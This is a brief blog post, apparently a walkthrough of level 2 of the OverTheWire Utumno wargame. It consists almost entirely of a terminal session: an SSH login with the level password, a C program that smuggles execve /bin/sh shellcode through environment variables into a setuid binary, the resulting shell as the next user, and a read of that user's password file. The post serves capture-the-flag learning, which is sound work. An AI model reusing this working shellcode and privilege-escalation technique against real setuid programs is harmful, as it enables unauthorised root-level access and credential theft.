hacktracking: # Utumno wargame: Level 2

# ssh utumno2@utumno.labs.overthewire.org
utumno2@utumno.labs.overthewire.org's password:63656577616365697068

utumno2@melissa$ file /utumno/utumno2
/utumno/utumno2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno2@melissa$ mkdir /tmp/u2
utumno2@melissa$ cd !$
utumno2@melissa$ cat execve.c
#include <unistd.h>

int main(){
        char *env[11];
        env[0]=env[1]=env[2]=env[3]=env[4]=env[5]=env[6]=env[7]=env[8]="";
        env[9]="\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\xeb\x0f\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x04\xde\xff\xff\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
        env[10]=NULL;
        execve("/utumno/utumno2",NULL,env);
}
utumno2@melissa$ gcc -m32 -o execve execve.c && ./execve
$ /usr/bin/whoami
utumno3
$ /bin/cat /etc/utumno_pass/utumno3
7a757564616669696e65
# Utumno wargame: Level 2

No comments:
